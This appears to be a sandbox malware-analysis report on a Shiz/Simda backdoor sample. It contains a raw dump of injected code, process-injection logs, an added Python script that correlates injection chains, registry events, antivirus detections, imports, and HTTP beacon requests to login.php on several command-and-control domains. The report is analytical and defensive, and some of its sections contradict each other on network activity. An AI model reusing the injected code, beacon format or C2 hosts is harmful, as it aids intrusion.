PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
process_handle: 0x000001f4
base_address: 0x027e1000
success 1 0
1619691122.739625
WriteProcessMemory
process_identifier: 2288
buffer: ×1œ2ñ253s3ö3”5
process_handle: 0x000001f4
base_address: 0x02834000
success 1 0
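The three signatures above are one chain per target process: allocate an RWX region, write the image into it, start a thread at an address inside it. The following is an added example, not part of the sandbox report or of the sample, of how an analyst can reconstruct that chain from Cuckoo-style call records and tell a completed injection (PID 2616) from a failed attempt (PID 2288) and from self-staging (PID 2368). The record format, the helper names and the short byte buffers are assumptions; the PIDs, handles, base addresses and sizes are taken from the report, and the records are constructed here.

```python
"""Reconstruct remote-injection chains from sandbox API-call records.

Added example for this report (not sandbox output). Groups
NtAllocateVirtualMemory / WriteProcessMemory / CreateRemoteThread records
by target PID and allocated region, then reports whether a PE image was
mapped there and whether a thread actually started in it.
"""
from collections import defaultdict
from dataclasses import dataclass, field

PAGE_EXECUTE_READWRITE = 0x40  # "protection: 64" in the report


@dataclass
class Region:
    pid: int
    base: int
    size: int
    protection: int
    writes: list = field(default_factory=list)   # (offset, length, starts_with_MZ)
    threads: list = field(default_factory=list)  # (entry_offset, succeeded)

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


def _region_for(regions, addr):
    return next((r for r in regions if r.contains(addr)), None)


def correlate(calls, source_pid):
    """Return one finding per allocated region that received writes or threads."""
    regions = defaultdict(list)  # target pid -> [Region]
    for c in calls:
        api, a = c["api"], c["args"]
        pid = a["process_identifier"]
        if api == "NtAllocateVirtualMemory":
            regions[pid].append(Region(pid, a["base_address"], a["region_size"], a["protection"]))
        elif api == "WriteProcessMemory":
            r = _region_for(regions[pid], a["base_address"])
            if r is not None:
                r.writes.append((a["base_address"] - r.base, len(a["buffer"]), a["buffer"][:2] == b"MZ"))
        elif api == "CreateRemoteThread":
            r = _region_for(regions[pid], a["function_address"])
            if r is not None:
                r.threads.append((a["function_address"] - r.base, c["status"] == "success"))
    findings = []
    for pid, regs in regions.items():
        for r in regs:
            if not r.writes and not r.threads:
                continue  # bare allocation: nothing to report yet
            findings.append({
                "target_pid": pid,
                "base": r.base,
                "cross_process": pid != source_pid,
                "rwx": r.protection == PAGE_EXECUTE_READWRITE,
                "pe_header_written": any(off == 0 and mz for off, _, mz in r.writes),
                "write_offsets": sorted(off for off, _, _ in r.writes),
                "thread_entry_offset": r.threads[0][0] if r.threads else None,
                "thread_started": any(ok for _, ok in r.threads),
            })
    return findings


def verdict(f):
    """Collapse a finding into the label an analyst triages on."""
    if not f["cross_process"]:
        return "self_map"   # image staged in the injector's own process
    if f["rwx"] and f["pe_header_written"] and f["thread_started"]:
        return "injected"   # image mapped and executing in the target
    return "attempted"      # written, but no thread ran (the PID 2288 case)


# Constructed records using the PIDs, handles, bases and sizes from the report;
# the buffers are short stand-ins for the real pages.
HDR = b"MZ\x90\x00" + b"This program cannot be run in DOS mode."
CODE = b"\x64\xa1\x30\x00\x00\x00\x56"
RELOC = b"\xd7\x31\x9c\x32\xf1\x32"
SAMPLE_PID = 2368


def _alloc(pid, handle, base, size=348160):
    return {"api": "NtAllocateVirtualMemory", "status": "success", "args": {
        "process_identifier": pid, "process_handle": handle, "base_address": base,
        "region_size": size, "protection": PAGE_EXECUTE_READWRITE}}


def _write(pid, handle, base, buf):
    return {"api": "WriteProcessMemory", "status": "success", "args": {
        "process_identifier": pid, "process_handle": handle, "base_address": base, "buffer": buf}}


def _thread(pid, handle, entry, ok):
    return {"api": "CreateRemoteThread", "status": "success" if ok else "failed", "args": {
        "process_identifier": pid, "process_handle": handle, "function_address": entry}}


CALLS = [
    _alloc(2368, 0xe8, 0x02290000, 688128),
    _write(2368, 0xe8, 0x02290000, HDR), _write(2368, 0xe8, 0x02291000, CODE),
    _write(2368, 0xe8, 0x022e4000, RELOC),
    _alloc(2616, 0x17c, 0x00320000),
    _write(2616, 0x17c, 0x00320000, HDR), _write(2616, 0x17c, 0x00321000, CODE),
    _write(2616, 0x17c, 0x00374000, RELOC), _thread(2616, 0x17c, 0x00321360, True),
    _alloc(2288, 0x17c, 0x004a0000),
    _write(2288, 0x17c, 0x004a0000, HDR), _write(2288, 0x17c, 0x004a1000, CODE),
    _write(2288, 0x17c, 0x004f4000, RELOC), _thread(2288, 0x17c, 0x004a1360, False),
]

if __name__ == "__main__":
    for f in correlate(CALLS, SAMPLE_PID):
        print(f"{verdict(f):9} pid={f['target_pid']} base={f['base']:#010x} "
              f"offsets={[hex(o) for o in f['write_offsets']]} "
              f"entry={f['thread_entry_offset'] and hex(f['thread_entry_offset'])}")
```

Correlating by region rather than by API name is what separates the PID 2616 chain (header at +0x0, code at +0x1000, relocations at +0x54000, thread at +0x1360, all inside one RWX allocation) from the nine PID 2288 chains that stop at the thread step; a rule that only counts WriteProcessMemory calls would rate 2288 as the more heavily injected process.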
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 events)
Caveat: the values written in the events below (WpadDecision, WpadDecisionReason, WpadDecisionTime and WpadNetworkName under a per-network subkey, plus WpadLastNetwork) are the per-network WPAD detection cache that the Windows WinHTTP/WinINet autoproxy code maintains whenever a process performs a proxy lookup. None of these events sets AutoConfigURL, ProxyServer or ProxyEnable, or writes a PAC file, so on their own they show that code in this process issued network requests through the system proxy logic, not that it changed the proxy configuration.
Time & API Arguments Status Return Repeated
1619691125.223625
RegSetValueExA
key_handle: 0x000006b4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619691125.223625
RegSetValueExA
key_handle: 0x000006b4
value: €&D£¢<×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619691125.223625
RegSetValueExA
key_handle: 0x000006b4
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619691125.223625
RegSetValueExW
key_handle: 0x000006b4
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619691125.223625
RegSetValueExA
key_handle: 0x000006b8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619691125.223625
RegSetValueExA
key_handle: 0x000006b8
value: €&D£¢<×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619691125.223625
RegSetValueExA
key_handle: 0x000006b8
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619691125.286625
RegSetValueExW
key_handle: 0x000004a8
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1619691125.973625
RegSetValueExA
key_handle: 0x000003c0
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619691125.973625
RegSetValueExA
key_handle: 0x000003c0
value: `—¶£¢<×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619691125.973625
RegSetValueExA
key_handle: 0x000003c0
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619691125.973625
RegSetValueExW
key_handle: 0x000003c0
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619691125.973625
RegSetValueExA
key_handle: 0x00000474
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619691125.973625
RegSetValueExA
key_handle: 0x00000474
value: `—¶£¢<×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619691125.973625
RegSetValueExA
key_handle: 0x00000474
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Network activity contains more than one unique useragent (2 events)
process svchost.exe useragent Internal
process svchost.exe useragent Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Both strings are sent by svchost.exe, one of the processes the sample singles out as an injection target below, not by the sample's own process. The second string is internally inconsistent (an MSIE 2.0 version token beside Trident/4.0, the IE8 engine, and .NET CLR tokens), so it is a hard-coded, spoofed User-Agent and usable as a network indicator.
Expresses interest in specific running processes (11 events)
process vboxservice.exe
process: potential process injection target csrss.exe
process system
process audiodg.exe
process: potential process injection target explorer.exe
process: potential process injection target svchost.exe
process: potential cuckoo sandbox detection pythonw.exe
process searchprotocolhost.exe
process 8e06cec4b5faf0db8f785f458b7dbce5.exe
process: potential process injection target winlogon.exe
process mobsync.exe
Generates some ICMP traffic
File has been identified by 63 AntiVirus engines on VirusTotal as malicious (50 of 63 events shown)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Zusy.326830
FireEye Generic.mg.8e06cec4b5faf0db
CAT-QuickHeal Backdoor.Generic
McAfee BackDoor-FDOB!8E06CEC4B5FA
Cylance Unsafe
Zillya Trojan.Shiz.Win32.554
SUPERAntiSpyware Trojan.Agent/Gen-Shiz
K7AntiVirus Spyware ( 004cadd91 )
Alibaba Backdoor:Win32/Simda.ef3da10d
K7GW Spyware ( 004cadd91 )
Cybereason malicious.4b5faf
Arcabit Trojan.Zusy.D4FCAE
Baidu Win32.Trojan-Spy.Shiz.b
Cyren W32/Shiz.R.gen!Eldorado
Symantec ML.Attribute.HighConfidence
APEX Malicious
Paloalto generic.ml
ClamAV Win.Trojan.Generic-6323528-0
Kaspersky HEUR:Backdoor.Win32.Generic
BitDefender Gen:Variant.Zusy.326830
NANO-Antivirus Trojan.Win32.Ibank.esrglb
AegisLab Trojan.Win32.Generic.m!e
Avast Win32:Shiz-JT [Trj]
Tencent Backdoor.Win32.Generic.a
Ad-Aware Gen:Variant.Zusy.326830
TACHYON Backdoor/W32.Shiz
Sophos ML/PE-A + Mal/Emogen-Y
Comodo TrojWare.Win32.Spy.Shiz.ZV@6ldvxf
F-Secure Trojan.TR/Hijacker.Gen
DrWeb Trojan.PWS.Ibank.323
VIPRE Trojan.Win32.Generic!BT
McAfee-GW-Edition BehavesLike.Win32.Backdoor.fh
Emsisoft Gen:Variant.Zusy.326830 (B)
Ikarus Backdoor.Win32.Simda
Jiangmin Backdoor.Generic.axsv
eGambit Unsafe.AI_Score_99%
Avira TR/Hijacker.Gen
Antiy-AVL Trojan/Win32.Unknown
Kingsoft Win32.Heur.KVMH017.a.(kcloud)
Gridinsoft Trojan.Win32.Agent.ko!s1
Microsoft Backdoor:Win32/Simda.gen!B
ZoneAlarm HEUR:Backdoor.Win32.Generic
GData Win32.Trojan.Spyshiz.A
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win32.Gen
Acronis suspicious
BitDefenderTheta Gen:NN.ZexaF.34670.wqX@a40ksLo
MAX malware (ai score=82)
Visual analysis
Binary image
No binary image available: no binary visualization image was generated for this sample.
Runtime screenshots
No runtime screenshots available: no screenshots were captured while the sample was running.

PE Compile Time

2011-08-02 17:26:00

Imports

Library MSVCRT.dll:
0x40412c wcsstr
0x404130 _snwprintf
0x404134 strstr
0x404138 _snprintf
0x40413c _except_handler3
0x404140 memset
0x404144 memcpy
Library SHELL32.dll:
0x404160
0x404164 SHGetFolderPathA
Library SHLWAPI.dll:
0x40416c PathAddBackslashA
0x404170 StrStrIA
0x404174 PathFileExistsA
0x404178 PathAppendA
Library ntdll.dll:
0x404190 RtlAdjustPrivilege
0x404194 RtlImageNtHeader
0x404198 RtlCreateUserThread
Library KERNEL32.dll:
0x40402c GetModuleFileNameW
0x404034 MoveFileA
0x404038 DeviceIoControl
0x40403c ExitProcess
0x404040 GlobalAddAtomA
0x404044 GlobalFindAtomA
0x404048 CopyFileA
0x40404c GetCurrentProcessId
0x404054 CreateFileW
0x404058 GetVersionExA
0x40405c FreeLibrary
0x404060 IsDebuggerPresent
0x404064 GetTickCount
0x404070 GetModuleFileNameA
0x404074 CreateFileA
0x404078 SetFilePointer
0x40407c MoveFileExA
0x404080 lstrcpynA
0x404084 SetEndOfFile
0x404088 UnlockFile
0x40408c LockFile
0x404090 SetFileTime
0x404094 WriteFile
0x404098 IsBadWritePtr
0x40409c ReadFile
0x4040a0 GetFileSizeEx
0x4040a4 GetLastError
0x4040a8 SetFileAttributesA
0x4040ac GetTempFileNameA
0x4040b0 GetFileTime
0x4040b4 GetTempPathA
0x4040b8 DeleteFileA
0x4040bc GetProcAddress
0x4040c0 GetModuleHandleA
0x4040c4 HeapAlloc
0x4040c8 HeapFree
0x4040cc GetProcessHeap
0x4040d0 HeapValidate
0x4040d4 GetCurrentProcess
0x4040d8 Sleep
0x4040e0 VirtualAlloc
0x4040e4 VirtualQuery
0x4040e8 Process32First
0x4040ec VirtualFree
0x4040f0 CreateRemoteThread
0x4040f4 OpenProcess
0x4040f8 CreateProcessA
0x4040fc Module32First
0x404104 VirtualAllocEx
0x404108 LoadLibraryA
0x40410c Process32Next
0x404114 Module32Next
0x404118 CloseHandle
0x40411c WriteProcessMemory
0x404120 SwitchToThread
Library USER32.dll:
0x404180 FindWindowA
0x404184 CharUpperA
0x404188 PostMessageA
Library ADVAPI32.dll:
0x404000 RegCreateKeyExA
0x404004 RegSetValueExA
0x404008 RegQueryValueExA
0x40400c RegOpenKeyExA
0x404010 RegFlushKey
0x404014 RegCloseKey
0x404018 OpenProcessToken
0x40401c GetTokenInformation
0x404020 GetUserNameA
Library ole32.dll:
0x4041a0 CoUninitialize
0x4041a4 CoCreateInstance
0x4041ac CoInitializeEx
Library OLEAUT32.dll:
0x40414c SysFreeString
0x404150 SysAllocString
0x404154 VariantClear
0x404158 VariantInit

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49180 162.255.119.102 80
192.168.56.101 49200 198.54.117.217 80
192.168.56.101 49202 198.54.117.217 80
192.168.56.101 49189 208.100.26.245 lyvyxor.com 80
192.168.56.101 49186 23.80.253.233 80
192.168.56.101 49196 23.80.253.233 80
192.168.56.101 49184 35.225.160.245 volykyc.com 80
192.168.56.101 49188 35.225.160.245 volykyc.com 80
192.168.56.101 49199 52.72.29.7 80
192.168.56.101 49181 54.227.98.220 pumyxiv.com 80
192.168.56.101 49182 54.227.98.220 pumyxiv.com 80
192.168.56.101 49183 54.227.98.220 pumyxiv.com 80
192.168.56.101 49187 54.227.98.220 pumyxiv.com 80
192.168.56.101 49190 54.227.98.220 pumyxiv.com 80
192.168.56.101 49192 54.227.98.220 pumyxiv.com 80
192.168.56.101 49193 54.227.98.220 pumyxiv.com 80
192.168.56.101 49194 54.227.98.220 pumyxiv.com 80
192.168.56.101 49195 54.227.98.220 pumyxiv.com 80
192.168.56.101 49209 54.227.98.220 pumyxiv.com 80
192.168.56.101 49210 54.227.98.220 pumyxiv.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 49710 114.114.114.114 53
192.168.56.101 49713 114.114.114.114 53
192.168.56.101 50002 114.114.114.114 53
192.168.56.101 50047 114.114.114.114 53
192.168.56.101 50320 114.114.114.114 53
192.168.56.101 50433 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 50849 114.114.114.114 53
192.168.56.101 50921 114.114.114.114 53
192.168.56.101 51137 114.114.114.114 53
192.168.56.101 51162 114.114.114.114 53
192.168.56.101 51326 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 51660 114.114.114.114 53
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 52124 114.114.114.114 53
192.168.56.101 52126 114.114.114.114 53
192.168.56.101 52345 114.114.114.114 53

HTTP & HTTPS Requests

URI Data
http://lyvyxor.com/login.php
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvyxor.com
Content-Length: 6

\x9e\x84\xb5\xe8q(
http://pupybul.com/login.php
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupybul.com
Content-Length: 6

\x9e\x84\xb5\xe8q(
http://volykyc.com/login.php
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: volykyc.com
Content-Length: 6

\x9e\x84\xb5\xe8q(
http://lysyfyj.com/login.php
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysyfyj.com
Content-Length: 6

\x9e\x84\xb5\xe8q(
http://qegyhig.com/login.php
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Content-Length: 6

\x9e\x84\xb5\xe8q(
http://pumypog.com/login.php
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pumypog.com
Content-Length: 6

\x9e\x84\xb5\xe8q(
http://www.pupybul.com/login.php
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: www.pupybul.com
Connection: Keep-Alive

\x9e\x84\xb5\xe8q(
http://puzylyp.com/login.php
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com
Content-Length: 6

\x9e\x84\xb5\xe8q(
http://ganypih.com/login.php
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganypih.com
Content-Length: 6

\x9e\x84\xb5\xe8q(
http://puvytuq.com/login.php
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puvytuq.com
Content-Length: 6

\x9e\x84\xb5\xe8q(

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.